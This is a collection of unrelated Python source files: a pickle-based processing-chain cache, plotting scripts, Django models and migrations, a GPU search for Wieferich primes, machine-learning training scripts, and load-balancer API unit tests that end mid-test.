chain_repr.extend((str(module.__class__), repr(module.func),
repr(module.keywords)))
else:
chain_repr.append(repr(module))
return ' '.join(chain_repr)
def _process(self, data, cache):
"""Process data and puts them to structure for caching.
:param data: dict
:param cache: dict Caching structure
:return: (dict, bool)
"""
stop = False
try:
super(PickleCache, self).process(data)
except StopIteration:
stop = True
data_to_save = data
cache = dict() if cache is None else cache
cache[self.chain_info['chain_hash']] = {"data": data_to_save,
"stopped": stop,
'chain_repr': self.chain_info[
'chain_repr'],
'chain_mtime': self.chain_info[
'chain_mtime']}
return cache, stop
def _check_time_consistency(self, cache_mtime, chain_mtime):
"""Check whether modification times correspond.
:param cache_mtime: float Modification time of modules by which cached data were processed
:param chain_mtime: float Modification time of modules in chain
"""
if cache_mtime != chain_mtime:
log.warn("""Modification times do not correspond.
Last change of chain: {}
Last change in cache: {}""".format(time.ctime(chain_mtime),
time.ctime(cache_mtime)))
def hash_chain(self):
"""Hash the chain in order to use the hash as a dictionary key."""
if len(self.modules) != self.chain_info['chain_len']:
self.chain_info = {
'chain_len': len(self.modules),
'chain_mtime': self._get_chain_mtime(self.modules),
'chain_hash': self._get_chain_hash(self.modules),
'chain_repr': self._get_chain_repr(self.modules),
}
@property
def chain_hash(self):
"""Return chain_hash of the current chain."""
return self.chain_info['chain_hash']
def process(self, data):
"""
Checks if there is cached data. If so, returns it, otherwise runs the chain and stores the processed data.
:type data: dict
:return:
"""
file = self.get_cache_file(data)
loaded = False
if self.check_cache_exists(data):
if self.force:
log.info("Item found in cache but force=True")
else:
try:
log.info("Found in cache, skipping chain")
with open(file, 'rb') as f:
# https://stackoverflow.com/questions/2766685/how-can-i-speed-up-unpickling-large-objects-if-i-have-plenty-of-ram/36699998#36699998
# disable garbage collector for speedup unpickling
gc.disable()
cache = pickle.load(f)
# enable garbage collector again
gc.enable()
retrieved_data = cache['data']
stop = cache["stopped"]
if stop:
raise StopIteration()
self._check_time_consistency(cache['chain_mtime'],
self.chain_info['chain_mtime'])
for key, value in retrieved_data.items():
data[key] = value
loaded = True
except EOFError:
log.warning(
"Failed to load cache item {} (corrupted file will be deleted)".format(file))
os.unlink(file)
if not loaded:
log.debug("Not found in cache, processing chain")
cache, stop = self._process(data, {})
cache = cache[self.chain_info['chain_hash']]
if self.save_cache:
with open(file, 'wb') as f:
try:
pickle.dump(cache, f, protocol=HIGHEST_PROTOCOL)
except:
pickle.dump(cache, f)
# Try to set some more flexible access rights
try:
os.chmod(file, RWRWRW)
except OSError:
pass
def close(self):
"""Close cache and chain."""
super(PickleCache, self).close()
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams["font.size"] = 15
dat = pd.read_json("4d_plot_data.json")
xs = dat["n_features"]
ys = dat["n_est"]
zs = dat["mae"]
cs = dat["max_depth"]
xs2 = xs.unique()
ys2 = ys.unique()
xticks = [0.05] + list(np.linspace(0.2, 1, 5))
# normalisation
alpha = ((zs-zs.min())/(zs.max()-zs.min()))
# colour array
rgba_colors = np.zeros((zs.shape[0], 4))
rgba_colors[:, 2] = 1.0
rgba_colors[:, 3] = alpha
# fig, ax = plt.subplots(figsize=(25,15))
# ax.scatter(zs, alpha)
# ax.set(xlabel="mean absolute error",
# ylabel="normalised")
# plt.tight_layout()
# plt.show()
# power = 5
# fig, ax = plt.subplots(1,2, figsize=(25, 15))
# ax[0].scatter(zs, alpha)
# ax[1].scatter(zs, alpha**power)
# ax[0].set(xlabel="mean absolute error",
# ylabel="normalised")
# ax[1].set(xlabel="mean absolute error",
# ylabel=f"normalised^{power}")
# plt.tight_layout()
# plt.show()
rgba_colors[:, 3] = alpha**5
fig, ax = plt.subplots(figsize=(25, 15), subplot_kw={"projection": "3d"})
ax.scatter(xs, ys, cs,
c=rgba_colors,
s=alpha**5*100,
marker=".")
ax.scatter(1, 100, 3, marker="v", c="r", s=100)
ax.set(ylabel="n_estimators",
xlabel="n_features",
zlabel="max_depth",
zticks=cs.unique(),
zlim=(3, 6),
xticks=xticks,
)
ax.set_title("4-th dimension size and transparency\nthe power of power")
plt.tight_layout()
plt.show()
|
from .books.list import book_list
from .librarians.list import list_librarians
from .libraries.list import list_library
from .home import home
from .auth.logout import logout_user
from .books.form import book_form
from .libraries.form import library_form, library_edit_form
from .books.details import book_details
from .libraries.details import library_details
from .books.form import book_form, book_edit_form
# from .librarians.details import librarian_details
# from .librarians.form import librarian_form
|
from Observation import Observation
class SyntheticObservation(Observation):
def __init__(self):
Observation.__init__(self)
self.schema = None
self.schema_var = None
self.successful_var = None
self.successful = False
def equals(self, o2):
if (type(self) != type(o2)):
return False;
so2 = SyntheticObservation(o2)
if (self.schema == None):
return False
return self.schema.equals(o2.schema) and self.successful == o2.successful
def copy(self):
so = SyntheticObservation()
so.schema = self.schema.copy()
so.successful = self.successful
so.sensor_id = self.sensor_id
return so
def get_properties(self):
props = {}
if (self.schema_var != None):
props["schema"] = self.schema_var
else:
props["schema"] = self.schema.id.to_string()
if (self.successful_var != None):
props["successful"] = self.successful_var
else:
props["successful"] = self. successful.to_string()
return props;
def get_concrete_properties(self):
props = {}
props["schema"] = self.schema.id.to_string()
props["successful"] = self.successful.to_string()
return props
def set_property_var(self, property, variable):
if property == "schema":
self.schema_var = variable
if property == "successful":
self.successful_var = variable
|
import pickle
import numpy as np
import tensorflow as tf
import tensorflow.keras as kr
import Configuration as cfg
def load_char_to_index(char_to_index_path):
with open(char_to_index_path, 'rb') as char_to_index_file:
return pickle.load(char_to_index_file)
def save_char_to_index(char_to_index, char_to_index_path):
with open(char_to_index_path, 'wb') as char_to_index_file:
pickle.dump(char_to_index, char_to_index_file, protocol=pickle.HIGHEST_PROTOCOL)
def load_train_data(train_data_path):
train_data_file = open(train_data_path, 'r')
train_data_text = train_data_file.read()
train_data_file.close()
train_data_text = train_data_text.lower().replace('\r', '').replace('\n', ' ')
char_list = sorted(list(set(train_data_text)))
char_count = len(char_list) + 1
char_to_index = dict((char, index + 1) for index, char in enumerate(char_list))
encoded_train_data_text = [char_to_index[char] for char in train_data_text]
sequence_list = list()
for pos in range(cfg.max_sequence_len + 1, len(encoded_train_data_text)):
encoded = encoded_train_data_text[pos - (cfg.max_sequence_len + 1):pos]
for i in range(1, len(encoded)):
sequence_list.append(encoded[:i + 1])
sequence_list = kr.preprocessing.sequence.pad_sequences(sequence_list, maxlen=cfg.max_sequence_len + 1, padding='pre', truncating='pre')
sequence_list = np.array(sequence_list)
train_text = kr.utils.to_categorical(sequence_list[:, :-1], num_classes=char_count)
train_label = kr.utils.to_categorical(sequence_list[:, -1], num_classes=char_count)
return char_to_index, char_count, train_text, train_label
|
from __future__ import print_function, division
import numpy as np
from timeit import default_timer as timer
from numbapro import cuda
from thread import start_new_thread
@cuda.jit('uint64(uint64, uint64, uint64)', inline=True, device=True)
def modexp(base, exponent, p):
"""
iterative modular expoentiation
:param base:
:param exponent:
:param p:
:return:
"""
result = 1
base = base % p
while exponent > 0:
if exponent % 2 == 1:
result = (result*base) % p
exponent = exponent >> 1
base = (base*base) % p
return result
@cuda.jit('void(uint64[:], uint64[:])', target='gpu')
def wieferich(check, result):
"""
checks if a given number is a wieferich prime
:param check: list of numbers to check
:param result: list of wieferich numbers (or 0)
:return:
"""
#current index
i = cuda.grid(1)
ac = check[i]
#modexp params
m = 2
e = ac-1
n = ac**2
if modexp(m, e, n) == 1:
result[0] = ac
@cuda.jit('void(uint64[:], uint64[:])', target='gpu')
def fermat_wieferich(check, result):
"""
checks if a given number is composite fermat
:param check: list of numbers to check
:param result: list of composite fermats numbers (or 0)
:return:
"""
#current index
i = cuda.grid(1)
ac = check[i]
#params for fermat-check
m = 2
e = ac-1
n = ac
#if fermat run wieferich-check
if modexp(m, e, n) == 1:
n = ac**2
if modexp(m, e, n) == 1:
result[i] = ac
def main():
RUNS = 100000
time_deltas = []
BLOCKS = 50000
THREADSPERBLOCK = 256
SIZE = BLOCKS * THREADSPERBLOCK
wieferichs = []
overall_timer_start = timer()
for i in range(RUNS):
start = 6700000000000001 + (i * SIZE)
if i % 500 == 0:
print (str(i) + "th Run, checking from " + str(start) + " to " + str(start+SIZE))
check = create_list(start, SIZE)
#result = np.zeros(SIZE, dtype=np.uint64)
result = np.zeros(1, dtype=np.uint64)
start_time = timer()
wieferich[BLOCKS, THREADSPERBLOCK](check, result)
needed_time = timer() - start_time
time_deltas.append(needed_time)
#print ("%f seconds" % needed_time)
#start threaded result processing
start_new_thread(proc_result,(result[0], start))
#proc_result(result, i)
#print(result)
time_in_seconds = timer() - overall_timer_start
import datetime
execution_delta = str(datetime.timedelta(seconds=time_in_seconds))
print("time: " + execution_delta + " for %d numbers" % ((SIZE*RUNS)))
print (datetime.datetime.today())
# save times to file
f = open('time.txt', 'a')
for item in time_deltas:
print(str(item), file=f)
f.close()
import matplotlib.pyplot as plt
plt.title("Execution per block")
plt.xlabel("xth block (" + str(SIZE) + " numbers per block)")
plt.ylabel("execution time in seconds")
plt.plot(time_deltas)
#plt.savefig("overnight.png")
#plt.show()
def create_list(start, size):
"""
creates a np list of odd numbers
:param start: start of list
:param size: size of list
:return: list
"""
if start % 2 != 1:
start += 1
list = np.arange(start, start+size*2, 2, dtype=np.uint64)
return list
def proc_result(result, start):
"""
process results -> needs to be threaded properly
:param result: result to be processed
:param name: thread count
:return:
"""
if result == 0:
return
print(result)
f = open('wieferichs.txt', 'a')
print(str(result) + " in range from " + str(start), file=f)
f.close()
if __name__ == '__main__':
main()
#from profiling import test
#test()
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
#这里设函数为y=3x+2
x_data = [1.0,2.0,3.0]
y_data = [5.0,8.0,11.0]
def forward(x):
return x * w + b
def loss(x,y):
y_pred = forward(x)
return (y_pred-y)*(y_pred-y)
mse_list = []
W=np.arange(0.0,4.1,0.1)
B=np.arange(0.0,4.1,0.1)
[w,b]=np.meshgrid(W,B)
l_sum = 0
for x_val, y_val in zip(x_data, y_data):
y_pred_val = forward(x_val)
print(y_pred_val)
loss_val = loss(x_val, y_val)
l_sum += loss_val
fig = plt.figure()
ax = Axes3D(fig)
ax.plot_surface(w, b, l_sum/3)
plt.show()
|
from collections.abc import Iterable
def _flatten(l,ret):
for i in l:
if isinstance(i, Iterable) and type(i) is not str:
_flatten(i,ret)
else:
ret.append(i)
return ret
def flatten(l):
ret = []
return list(_flatten(l,ret))
if __name__ == "__main__":
inp = [1, [2, 3], [4, 5, [6, 7, [8, 9, 10]]]]
inp2 = ['a', 'b', [1, 2, 3],
['c', 'd', ['e', 'f', ['g', 'h']]],
[4, [5, 6, [7, [8]]]]]
inp3 = [1, (2, 3), [(4, 5), [6, 7, [8, 9, 10]]]]
print(list(flatten(inp)))
print(list(flatten(inp2)))
print(list(flatten(inp3)))
|
#-*- coding: utf-8-*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
#1、图片表
class Image(models.Model):
imageId = models.AutoField(primary_key=True)
url = models.CharField(max_length=100)
img = models.FileField(upload_to="picture")
#2、栏目表
class Column(models.Model):
columnId = models.AutoField(primary_key=True)
parentColum = models.CharField(max_length=50, null=True)
sort = models.IntegerField()
level = models.IntegerField()
name = models.CharField(max_length=50)
is_use = models.BooleanField(default=True)
imageId = models.ForeignKey(Image, db_column="imageId")
class Meta:
ordering = ['sort']
#3、部门
class Department(models.Model):
departmentId = models.AutoField(primary_key=True)
name = models.CharField(max_length=50)
#4、新闻表
class News(models.Model):
newsId = models.AutoField(primary_key=True)
title = models.CharField(max_length=50)
create_date = models.DateField()
upload_date = models.DateField(null=True)
text = models.TextField()
writer = models.CharField(max_length=50)
is_stick = models.BooleanField(default=False) #是否置顶
imageId = models.ForeignKey(Image, db_column="imageId")
columnId = models.ForeignKey(Column, db_column="columnId")
departmentId = models.ForeignKey(Department, db_column="departmentId")
#5、管理员
class Administrators(models.Model):
username = models.CharField(max_length=20, primary_key=True)
name = models.CharField(max_length=50, null=True)
password = models.CharField(max_length=20)
departmentId = models.ForeignKey(Department, db_column="departmentId")
level = models.IntegerField(null=True)
is_use = models.BooleanField(default=True)
|
class Demo4:
#static variable
name = "Sathya"
@classmethod
def sample(cls):
#Calling static variable using class name
print(Demo4.name)
#static variable is available for class
print(cls.name)
@classmethod
def sample2(cls):
Demo4.name = "Sathya Tech"
print(Demo4.name)
cls.name = "Sathya Tech AMPT"
print(cls.name)
#----------------------
print("Before Calling Functions -- ",Demo4.name)
Demo4.sample()# sathya sathya
Demo4.sample2()
print("After Calling Functions -- ",Demo4.name)
#---------------------
Demo4().sample()
|
import os
try:
from __revision__ import __revision__
except:
__revision__ = 'develop'
metadata = {
'name': "djopenid",
'version': "1.0",
'release': __revision__,
'url': 'http://www.jollydream.com',
'author': 'hanbox',
'author_email': 'han.mdarien@gmail.com',
'admin': 'han.mdarien@gmail.com',
'dependencies': (
'python-openid',
'boto',
'South',
'django-extensions',
),
'description': 'Jollydream Inc',
'license': 'Private',
}
|
# Generated by Django 2.2.1 on 2019-09-22 14:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myapp', '0005_auto_20190914_2336'),
]
operations = [
migrations.CreateModel(
name='Education',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('head_image', models.ImageField(default='bandup/media/default.jpg', upload_to='profile_pics')),
('teacher_name', models.CharField(max_length=100)),
('years_of_playing', models.CharField(max_length=100)),
('course_content', models.CharField(max_length=5000)),
('charging_fee', models.CharField(max_length=100)),
],
),
]
|
from flask_script import Manager
from movie import app, db, Director, Movie
manager = Manager(app)
# reset the database and create some initial data
@manager.command
def deploy():
db.drop_all()
db.create_all()
StevenSpielberg = Director(name='Steven Spielberg', about='Steven Spielberg is an American filmmaker and the highest grossing filmmaker of all time')
RyanCoogler = Director(name='Ryan Coogler', about='Ryan Coogler is an up and coming director known for his movies Creed and Black Panther')
JJAbrams = Director(name='JJ Abrams', about='JJ Abrams is a director well known for his Star Trek and Star Wars movies')
movie1 = Movie(name='Jurassic Park', year=1993, ratings="IMDb: 8.1, Rotten Tomatoes: 92%", director=StevenSpielberg)
movie2 = Movie(name='BlackPanther', year=2018, ratings="IMDb: 7.6, Rotten Tomatoes: 97%", director=RyanCoogler)
movie3 = Movie(name='Star Wars: The Force Awakens', year=2015, ratings="IMDb: 8, Rotten Tomatoes: 93%", director=JJAbrams)
db.session.add(StevenSpielberg)
db.session.add(RyanCoogler)
db.session.add(JJAbrams)
db.session.add(movie1)
db.session.add(movie2)
db.session.add(movie3)
db.session.commit()
if __name__ == "__main__":
manager.run()
|
# lec4[Multiple feature Linear Regression]
import tensorflow as tf
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
## function ##
def standard(x):
global memoryList
memoryList.append((np.mean(x), np.std(x)))
return (x - np.mean(x)) / np.std(x)
def rollback(x, num):
mean, std = memoryList[num][0], memoryList[num][1]
return x * std + mean
## Variable ##
data = pd.read_csv("d:/data/ex01/ex1data2.txt", encoding='utf-8', sep=',', header=None)
memoryList = []
m = len(data) # 46 --> data 개수
x1_org = data.loc[:, 0] # x1축
x1_scale = standard(x1_org) # x1 스케일링
x2_org = data.loc[:, 1] # x2축
x2_scale = standard(x2_org) # x2 스케일링
y = data.iloc[:, -1] # y축 (가격)
y = standard(y) # reshape 중요
learning_rate = 0.01
iteration = 1500
## x, y placeholder ##
x1= tf.placeholder(tf.float32)
x2= tf.placeholder(tf.float32)
Y= tf.placeholder(tf.float32)
## W, b, 가설설정 --> H(x) = Wx + b ##
w1 = tf.Variable(tf.random_normal([1]), name='weight1')
w2 = tf.Variable(tf.random_normal([1]), name='weight2')
b = tf.Variable(tf.random_normal([1]), name='bias')
hypothesis = x1 * w1 + x2 * w2 + b
## cost와 gradient Descent ##
cost = tf.reduce_mean(tf.square(hypothesis-Y)) # 오차 --> (h(x) - y)
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
## 실행 단계 ##
train = optimizer.minimize(cost)
sess = tf.Session() # session open
sess.run(tf.global_variables_initializer()) # 변수 initializer
costList = []
costdf = pd.DataFrame(costList)
for step in range(iteration):
cost_val, hy_val, _, w1_val, w2_val, b_val = sess.run([cost, hypothesis, train, w1, w2, b], feed_dict={x1: x1_scale, x2: x2_scale, Y:y})
costList.append(cost_val)
costdf[learning_rate] = costList
## cost 그래프 ##
plt.plot(costdf[learning_rate], 'r-')
plt.show()
## fitted-line 그래프 ## 3차원을 2차원에 그리다보니, 그래프 모양이 여려 겹치는 모습
X = pd.DataFrame([x1_scale,x2_scale]).T
plt.plot(X, y, 'rx', markersize=10)
plt.plot(X[0], hy_val, 'b-')
plt.show()
predict = [(1650.-memoryList[0][0])/memoryList[0][1], (3-memoryList[1][0])/memoryList[1][1]]
y_hat = rollback(predict[0] * w1_val + predict[1] * w2_val + b_val, 2)
y_hat
sess.close()
|
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.optim as optim
import argparse
import os
import numpy as np
from tensorboardX import SummaryWriter
from Resnet18 import Resnet_18
from Dataloader import Load_Cifar10
from Visualization import Filter_visualization, Featuremap_visualization
import warnings
warnings.filterwarnings("ignore")
# Parameters setting
parser = argparse.ArgumentParser(description='Train/Test Resnet18 based on Cifar-10 with Pytorch')
parser.add_argument('--gpu', type=bool, default=torch.cuda.is_available(), help='gpu or cpu')
parser.add_argument('--lr', type=float, default=0.001, help='Initial learning rate')
parser.add_argument('--batch_size', type=int, default=100, help='batch size for train and test')
parser.add_argument('--num_epoch', type=int, default=20, help='Epoch Times of training')
parser.add_argument('--checkpoint_path', type=str, default='./check_point/', help='Path to save model')
parser.add_argument('--log_path', type=str, default='./qiuke/', help='Path to save tensorboardX')
parser.add_argument('--visual_path', type=str, default='./Visualization/', help='Path to save Filter/Featuremap Visualization')
args = parser.parse_args()
# Essential information of Cifar10
CLASSES = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def train(epoch):
model.train()
sum_loss = 0.0
correct_num = 0
total_num = 0
acc = 0
for batch_num, (train_data, label) in enumerate(train_loader):
train_data, label = train_data.to(device), label.to(device)
optimizer.zero_grad()
# run a batch
result = model(train_data)
loss = loss_function(result, label)
loss.backward()
optimizer.step()
# calculate Acc and Loss
sum_loss += loss.item()
# print(result)
_, predicted = torch.max(result, 1)
# print(predicted)
total_num += label.size(0)
# print(label.size(0))
correct_num += np.sum(predicted.cpu().numpy() == label.cpu().numpy())
acc = 100. * correct_num/total_num
# print for each batch
step_in_a_epoch = len(train_loader)
trained_step = 1 + step_in_a_epoch * epoch + batch_num
total_step = step_in_a_epoch * args.num_epoch
trained_num = batch_num * args.batch_size + len(train_data)
# total_sam = len(train_loader.dataset)
# loss.item Correspond to current batch loss;
# sum_loss/(batch_num+1) Correspond to the average batch loss in current epoch
print('Epoch:{}/{} Step:{}/{} Trained_num:{}/{} Train_Loss:{:0.4f} Avg_loss:{:0.4f} lr:{:0.5f} Acc:{:0.3f}%'.format(
epoch+1, args.num_epoch,
trained_step, total_step,
trained_num, len(train_loader.dataset),
loss.item(), sum_loss/(batch_num+1),
optimizer.param_groups[0]['lr'], acc))
# record for tensorboard
#writer.add_scalar('Train_loss', loss.item(), global_step=trained_step)
writer.add_scalar('Train_Accuracy', acc, global_step=trained_step)
writer.add_scalars('Train_loss', {'Train_Loss': loss.item(), 'Avg_loss': sum_loss/(batch_num+1)}, global_step=trained_step)
return step_in_a_epoch, sum_loss/step_in_a_epoch, acc
def Test(epoch):
# BN won't be changed
model.eval()
sum_loss = 0.0
correct_num = 0
total_num = 0
# don't calculate grad
with torch.no_grad():
# chose one batch of
for batch_num, (test_data, label) in enumerate(test_loader):
test_data, label = test_data.to(device), label.to(device)
result = model(test_data)
loss = loss_function(result, label)
# calculate Acc and Loss
sum_loss += loss.item()
_, predicted = result.max(1)
total_num += label.size(0)
correct_num += np.sum(predicted.cpu().numpy() == label.cpu().numpy())
test_acc = 100. * correct_num/total_num
test_loss = sum_loss/len(test_loader)
print('Epoch:{epoch}/{total_epoch} Test_Loss:{:0.4f} Test_Acc:{:0.4f}%'.format(
test_loss, test_acc, epoch=epoch+1, total_epoch=args.num_epoch))
# record for tensorboard
writer.add_scalar('Test_loss', test_loss, epoch)
writer.add_scalar('Test_Accuracy', test_acc, epoch)
return test_loss, test_acc
if __name__ == '__main__':
# chose gpu
if args.gpu:
device = torch.device('cuda')
cudnn.benchmark = True
else:
device = torch.device('cpu')
# Load_Cifar10()
train_loader, test_loader = Load_Cifar10(args.batch_size)
# Load Resnet_18
model = Resnet_18().to(device)
# define lr,loss_f, optimizer
loss_function = nn.CrossEntropyLoss().to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[10, 15, 18], gamma=0.4)
# warmup_scheduler = WarmUpLR(optimizer, iter_per_epoch * args.warm)
# prepare for tensorboard
writer = SummaryWriter(log_dir=args.log_path)
# Train and Test
print("start train!")
best_Acc = 80
Train_Loss = 0.0
Train_Acc = 0.0
Test_Loss = 0.0
Test_Acc = 0.0
for epoch in range(args.num_epoch):
# Train/Test per epoch
step_per_epoch, Train_Loss, Train_Acc = train(epoch)
scheduler.step(epoch)
Test_Loss, Test_Acc = Test(epoch)
# record for tensorboardX
writer.add_scalars('Contrast on Loss', {'Train_Loss': Train_Loss, 'Test_Loss': Test_Loss}, epoch)
writer.add_scalars('Contrast on Acurracy', {'Train_Acc': Train_Acc, 'Test_Acc': Test_Acc}, epoch)
# check checkpoint
if not os.path.exists(args.checkpoint_path):
os.makedirs(args.checkpoint_path)
# chose model to save
current_step = step_per_epoch * (epoch + 1)
if (epoch + 1) == args.num_epoch:
torch.save(model, args.checkpoint_path + 'Resnet18_step{step}.pth'.format(step=current_step))
if Test_Acc > best_Acc and epoch > 0.75 * args.num_epoch:
best_Acc = Test_Acc
torch.save(model, args.checkpoint_path + 'Resnet18_step{step}_better.pth'.format(step=current_step))
# Filter visualization based on Plot and Torchvision
Filter_visualization(model, args.log_path, args.visual_path, current_step)
# Featuremap visualization based on Reverse_Resnet18
Featuremap_visualization(model, args.visual_path)
print('Featuremap Visualization Succeeded!')
print('done! Best accuracy = {:.2f}%'.format(best_Acc))
print("Hi~ Here are some warnings that don't affect the results\n Because I use PLT to draw single channel images.")
writer.export_scalars_to_json("./tensorboardX.json")
writer.close()
|
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import re
class FormReader:
def fetch_sheet(self, url):
all_list = self.get_data(url)
student_links = {}
all_list = all_list[1:]
for i in range(len(all_list)):
if ',' in all_list[i][0]:
student_tuple_list = (str(all_list[i][0])).split(',')
student_tuple = tuple(i for i in student_tuple_list)
student_links[student_tuple] = all_list[i][1]
else:
student_tuple = (all_list[i][0],)
student_links[student_tuple] = all_list[i][1]
return student_links
def get_data(self, url):
scope = ['https://spreadsheets.google.com/feeds']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
sh = client.open_by_url(str(url))
worksheet = sh.get_worksheet(0)
all_list = worksheet.get_all_values()
return all_list
|
loop = 5
while(loop <= 10):
print(loop)
loop += 1
print('Loop Ends')
print(loop)
|
"""
Unit tests for the
"""
from __future__ import absolute_import, division, unicode_literals
import json
import treq
from twisted.trial.unittest import SynchronousTestCase
from mimic.canned_responses.loadbalancer import load_balancer_example
from mimic.model.clb_errors import (
considered_immutable_error,
invalid_json_schema,
loadbalancer_not_found,
node_not_found,
updating_node_validation_error
)
from mimic.test.fixtures import APIMockHelper, TenantAuthentication
from mimic.rest.loadbalancer_api import LoadBalancerApi, LoadBalancerControlApi
from mimic.test.helpers import json_request, request_with_content, request
from mimic.util.helper import EMPTY_RESPONSE
import attr
class ResponseGenerationTests(SynchronousTestCase):
"""
Tests for Loud Balancer response generation.
"""
def test_canned_loadbalancer(self):
"""
Test that the canned load balancer response is returned as expected.
"""
expect_lb_name = "cannedTestLB"
expect_lb_protocol = "protocol"
expect_lb_port = 70
expect_lb_algorithm = "RANDOM"
expect_lb_httpsRedirect = "redirect"
expect_lb_halfClosed = "halfClosed"
expect_lb_connectionLogging = {"enabled": True}
expect_lb_contentCaching = True
expect_lb_timeout = 35
input_lb_info = {"name": expect_lb_name,
"protocol": expect_lb_protocol,
"port": expect_lb_port,
"timeout": expect_lb_timeout,
"httpsRedirect": expect_lb_httpsRedirect,
"halfClosed": expect_lb_halfClosed,
"connectionLogging": expect_lb_connectionLogging,
"contentCaching": expect_lb_contentCaching}
input_lb_id = "13579"
input_lb_time = "current_time"
input_lb_status = "ACTIVE"
actual = load_balancer_example(input_lb_info, input_lb_id, input_lb_status,
input_lb_time)
lb_example = {"name": expect_lb_name,
"id": input_lb_id,
"protocol": expect_lb_protocol,
"port": expect_lb_port,
"algorithm": expect_lb_algorithm,
"status": input_lb_status,
"cluster": {"name": "test-cluster"},
"timeout": expect_lb_timeout,
"created": {"time": input_lb_time},
"virtualIps": [{"address": "127.0.0.1",
"id": 1111, "type": "PUBLIC", "ipVersion": "IPV4"},
{"address": "0000:0000:0000:0000:1111:111b:0000:0000",
"id": 1111,
"type": "PUBLIC",
"ipVersion": "IPV6"}],
"sourceAddresses": {"ipv6Public": "0000:0001:0002::00/00",
"ipv4Servicenet": "127.0.0.1",
"ipv4Public": "127.0.0.1"},
"httpsRedirect": expect_lb_httpsRedirect,
"updated": {"time": input_lb_time},
"halfClosed": expect_lb_halfClosed,
"connectionLogging": expect_lb_connectionLogging,
"contentCaching": {"enabled": False}}
self.assertEqual(actual, lb_example)
@attr.s
class _CLBChangeResponseAndID(object):
"""
A simple data structure intended to conveniently communicate the results
of issuing a CLB control plane request.
"""
resp = attr.ib()
"The response returned from the .../attributes PATCH request."
lb_id = attr.ib()
"The CLB ID used for the purposes of performing the test."
class LoadbalancerAPITests(SynchronousTestCase):
"""
Tests for the Loadbalancer plugin API
"""
def setUp(self):
"""
Create a :obj:`MimicCore` with :obj:`LoadBalancerApi` as the only plugin
"""
lb = LoadBalancerApi()
self.helper = APIMockHelper(self, [lb, LoadBalancerControlApi(lb_api=lb)])
self.root = self.helper.root
self.uri = self.helper.uri
def _create_loadbalancer(self, name=None, api_helper=None, nodes=None):
"""
Helper method to create a load balancer and return the lb_id.
:param str name: The name fo the load balancer, defaults to 'test_lb'
:param api_helper: An instance of :class:`APIMockHelper` - defaults to
the one created by setup, but if different regions need to be
created, for instance, your test may make a different helper, and
so that helper can be passed here.
:param list nodes: A list of nodes to create the load balancer with -
defaults to creating a load balancer with no nodes.
:return: Load balancer ID
:rtype: int
"""
api_helper = api_helper or self.helper
lb_body = {
"loadBalancer": {
"name": name or "test_lb",
"protocol": "HTTP",
"virtualIps": [{"type": "PUBLIC"}]
}
}
if nodes is not None:
lb_body['loadBalancer']['nodes'] = nodes
resp, body = self.successResultOf(json_request(
self, api_helper.root, b"POST", api_helper.uri + '/loadbalancers',
lb_body
))
return body['loadBalancer']['id']
def _patch_attributes_request(
self, lb_id_offset=0, status_key=None, status_val=None
):
"""
Creates a CLB for the tenant, then attempts to patch its status using
the CLB control plane endpoint.
:param int lb_id_offset: Defaults to 0. If provided, the CLB that is
created for the tenant will be referenced in the patch request
offset by this much.
:param str status_key: Defaults to '"status"'. If provided, the patch
will be made against this member of the CLB's state. Note that
surrounding quotes are required for th key, thus giving the caller
the ability to deliberately distort the JSON.
:param str status_val: Defaults to 'PENDING_DELETE'. If provided, the
provided setting will be used for the status key provided.
:return: An instance of _CLBChangeResponseAndID. The `resp` attribute
will refer to Mimic's response object; `code` will be set to the
HTTP result code from the request.
"""
ctl_uri = self.helper.auth.get_service_endpoint(
"cloudLoadBalancerControl", "ORD"
)
lb_id = self._create_loadbalancer('test_lb') + lb_id_offset
status_key = status_key or '"status"'
status_val = status_val or 'PENDING_DELETE'
payload = ('{{{0}: "{1}"}}'.format(status_key, status_val)
.encode("utf-8"))
set_attributes_req = request(
self, self.root, b"PATCH", "{0}/loadbalancer/{1}/attributes".format(
ctl_uri, lb_id
),
payload
)
return _CLBChangeResponseAndID(
resp=self.successResultOf(set_attributes_req), lb_id=lb_id
)
def test_lb_status_changes_as_requested(self):
"""
Clients can ``PATCH`` to the ``.../loadbalancer/<lb-id>/attributes``
:obj:`LoadBalancerControlApi` endpoint in order to change the
``status`` attribute on the load balancer identified by the given
load-balancer ID for the same tenant in the :obj:`LoadBalancerApi`.
This attribute controls the status code returned when the load balancer
is retrieved by a ``GET`` request.
"""
r = self._patch_attributes_request()
self.assertEqual(r.resp.code, 204)
get_lb = request(self, self.root, b"GET", self.uri + '/loadbalancers/' + str(r.lb_id))
get_lb_response = self.successResultOf(get_lb)
get_lb_response_body = self.successResultOf(
treq.json_content(get_lb_response)
)["loadBalancer"]
self.assertEqual(get_lb_response.code, 200)
self.assertEqual(get_lb_response_body["status"], "PENDING_DELETE")
def test_lb_status_change_with_illegal_json(self):
"""
In the event the user sends a malformed request body to the
.../attributes endpoint, we should get back a 400 Bad Request.
"""
r = self._patch_attributes_request(status_key="\"status'")
self.assertEqual(r.resp.code, 400)
def test_lb_status_change_with_bad_keys(self):
"""
In the event the user sends a request to alter a key which isn't
supported, we should get back a 400 Bad Request as well.
"""
r = self._patch_attributes_request(status_key="\"stats\"")
self.assertEqual(r.resp.code, 400)
def test_lb_status_change_to_illegal_status(self):
"""
If we attempt to set a valid status on a valid CLB for a valid tenant
to a value which is nonsensical, we should get back a 400.
"""
r = self._patch_attributes_request(status_val="KJDHSFLKJDSH")
self.assertEqual(r.resp.code, 400)
def test_lb_status_change_against_undefined_clb(self):
"""
In the event the user sends a request to alter a key on a load balancer
which doesn't belong to the requestor, we should get back a 404 code.
"""
r = self._patch_attributes_request(lb_id_offset=1000)
